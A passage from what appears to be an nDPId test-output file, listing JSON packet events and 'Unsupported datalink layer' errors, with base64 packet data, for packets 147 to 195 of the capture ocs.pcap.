layer","datalink":12,"packet_id":147,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791286} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":147,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEcQABABoG5wKi0ArL40DbC2QBQ64tGkd7nkoPQEAa64nkAAAEBCAoANYRsRwYBBAEBBRLe56gz3uetn97nl+\/e56LH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":148,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791359} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":148,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEdQABABoHAwKi0ArL40DbC2QBQ64tGkd7nosewEAbn6nAAAAEBCAoANYR0RwYBKwEBBQre56gz3uetnw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":149,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791748} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":149,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEeQABABoHLwKi0ArL40DbC2QBQ64tGkd7nrZ+AEAcUKK4AAAEBCAoANYSbRwYBfA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":150,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791817} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":150,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEfQABABoG+wKi0ArL40DbC2QBQ64tGkd7nrZ+wEAcUyTwAAAEBCAoANYSiRwYBfAEBBQre57ML3ue4dw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":151,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791818} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":151,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEgQABABoG9wKi0ArL40DbC2QBQ64tGkd7nrZ+wEAcUw9AAAAEBCAoANYSiRwYBfAEBBQre57ML3ue94w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":152,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791850} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":152,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEhQABABoHIwKi0ArL40DbC2QBQ64tGkd7nveOAEAdCF\/4AAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":153,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791852} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":153,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEiQABABoG7wKi0ArL40DbC2QBQ64tGkd7nveOwEAdCrbsAAAEBCAoANYSlRwYBsAEBBQre57h33ue94w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":154,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791853} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":154,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEjQABABoHGwKi0ArL40DbC2QBQ64tGkd7nw0+AEAdvEmUAAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":155,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791854} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEkQABABoHFwKi0ArL40DbC2QBQ64tGkd7nyLuAEAecDMwAAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":156,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791924} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMElQABABoHEwKi0ArL40DbC2QBQ64tGkd7nzieAEAfJByQAAAEBCAoANYSsRwYBuA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":157,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791929} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":157,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEmQABABoHDwKi0ArL40DbC2QBQ64tGkd7n05OAEAf3AYgAAAEBCAoANYStRwYBuQ=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":158,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791929} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":158,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEnQABABoHCwKi0ArL40DbC2QBQ64tGkd7n2P+AEAgk++4AAAEBCAoANYStRwYBuQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":159,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791955} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":159,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDl5QABABglxwKi0ArL40DaPSAG7xozNKzpn9fOAEAHuWjsAAAEBCAoANYSwRwYBtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":160,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791981} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":160,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEoQABABoHBwKi0ArL40DbC2QBQ64tGkd7n3muAEAhR9j4AAAEBCAoANYSyRwYByw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":161,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791982} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":161,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEpQABABoHAwKi0ArL40DbC2QBQ64tGkd7n49eAEAh+8KQAAAEBCAoANYSyRwYBzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":162,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791985} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":162,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEqQABABoG\/wKi0ArL40DbC2QBQ64tGkd7n6UOAEAis6wkAAAEBCAoANYSzRwYBzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":163,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792049} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":163,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMErQABABoG+wKi0ArL40DbC2QBQ64tGkd7n7q+AEAjZ5V4AAAEBCAoANYS5RwYB2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":164,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792052} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":164,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEsQABABoG9wKi0ArL40DbC2QBQ64tGkd7n9BuAEAkG38UAAAEBCAoANYS5RwYB2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":165,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792055} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEtQABABoGwwKi0ArL40DbC2QBQ64tGkd7n9BuwEAkG82IAAAEBCAoANYS5RwYB2AEBBQre5\/mH3uf+8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":166,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792111} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":166,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEuQABABoGnwKi0ArL40DbC2QBQ64tGkd7n9BvQEAkGB1EAAAEBCAoANYS\/RwYB2AEBBRLe6ARf3ugJy97n+Yfe5\/7z"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":167,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792112} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":167,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEvQABABoGmwKi0ArL40DbC2QBQ64tGkd7n9BvQEAkGAeUAAAEBCAoANYS\/RwYB2AEBBRLe6ARf3ugPN97n+Yfe5\/7z"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":168,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792139} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":168,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEwQABABoGtwKi0ArL40DbC2QBQ64tGkd7n\/vOwEAkzzRcAAAEBCAoANYTCRwYB+QEBBQre6ARf3ugPNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":169,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792188} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":169,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMExQABABoGswKi0ArL40DbC2QBQ64tGkd7n\/vOwEAkzx6YAAAEBCAoANYTHRwYB+QEBBQre6ARf3ugUow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":170,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792258} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":170,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEyQABABoG3wKi0ArL40DbC2QBQ64tGkd7oFKOAEAlhvpgAAAEBCAoANYTORwYCDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":171,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792260} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":171,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEzQABABoG2wKi0ArL40DbC2QBQ64tGkd7oGg+AEAmOuP8AAAEBCAoANYTORwYCDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":172,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792325} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":172,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME0QABABoG1wKi0ArL40DbC2QBQ64tGkd7oH3uAEAm7s08AAAEBCAoANYTURwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":173,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792330} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":173,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME1QABABoG0wKi0ArL40DbC2QBQ64tGkd7oJOeAEAnorbUAAAEBCAoANYTVRwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":174,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792335} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME2QABABoGzwKi0ArL40DbC2QBQ64tGkd7oKlOAEAoWqBsAAAEBCAoANYTVRwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792355} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":176,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792402} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":176,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME3QABABoGmwKi0ArL40DbC2QBQ64tGkd7oKlOwEAoWT0EAAAEBCAoANYTcRwYCHgEBBQre6C+\/3ug1Kw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":177,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792403} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":177,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME4QABABoGlwKi0ArL40DbC2QBQ64tGkd7oKlOwEAoWSdUAAAEBCAoANYTcRwYCHgEBBQre6C+\/3ug6lw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":178,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792492} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":178,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASME5QABABoGcwKi0ArL40DbC2QBQ64tGkd7oKlPQEAoW258AAAEBCAoANYTlRwYCHgEBBRLe6EVv3uhK297oL7\/e6DqX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":179,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792559} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME6QABABoGjwKi0ArL40DbC2QBQ64tGkd7oOpewEApDEyYAAAEBCAoANYTsRwYCWAEBBQre6EVv3uhK2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":180,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793490} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":180,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME7QABABoGiwKi0ArL40DbC2QBQ64tGkd7oQAOwEApwDFkAAAEBCAoANYVJRwYDLwEBBQre6EVv3uhK2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":181,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793563} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":181,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME8QABABoGhwKi0ArL40DbC2QBQ64tGkd7oQAOwEApwBuYAAAEBCAoANYVQRwYDLwEBBQre6EVv3uhQRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":182,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793621} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":182,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME9QABABoGswKi0ArL40DbC2QBQ64tGkd7oUEeAEAqdf9gAAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":183,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793622} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":183,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME+QABABoGrwKi0ArL40DbC2QBQ64tGkd7oVbOAEArLej4AAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":184,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793623} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":184,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME\/QABABoGqwKi0ArL40DbC2QBQ64tGkd7oWx+AEAr4dKUAAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":185,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793724} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFAQABABoGpwKi0ArL40DbC2QBQ64tGkd7oYIuAEAslbvAAAAEBCAoANYVgRwYDdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":186,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793724} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFBQABABoGcwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslqawAAAEBCAoANYVgRwYDdwEBBQre6GX33uhrYw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":187,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793794} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":187,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFCQABABoGbwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslpDkAAAEBCAoANYVnRwYDdwEBBQre6GX33uhwzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":188,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793797} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":188,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFDQABABoGawKi0ArL40DbC2QBQ64tGkd7oYIuwEAslnswAAAEBCAoANYVoRwYDdwEBBQre6GX33uh2Ow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":189,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793870} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":189,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFEQABABoGZwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslmVkAAAEBCAoANYVvRwYDdwEBBQre6GX33uh7pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":190,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793964} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":190,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFFQABABoGYwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslk+QAAAEBCAoANYV4RwYDdwEBBQre6GX33uiBEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":191,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794049} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":191,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFGQABABoGjwKi0ArL40DbC2QBQ64tGkd7ogROAEAtSTcgAAAEBCAoANYWARwYDyg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":192,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794050} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":192,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFHQABABoGiwKi0ArL40DbC2QBQ64tGkd7ohn+AEAuASC4AAAEBCAoANYWARwYDyg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":193,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794121} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":193,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFIQABABoGhwKi0ArL40DbC2QBQ64tGkd7oi+uAEAutQnkAAAEBCAoANYWIRwYD3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":194,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794129} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":194,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFJQABABoGUwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutJnUAAAEBCAoANYWIRwYD3gEBBQre6JFX3uiWww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":195,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794199} 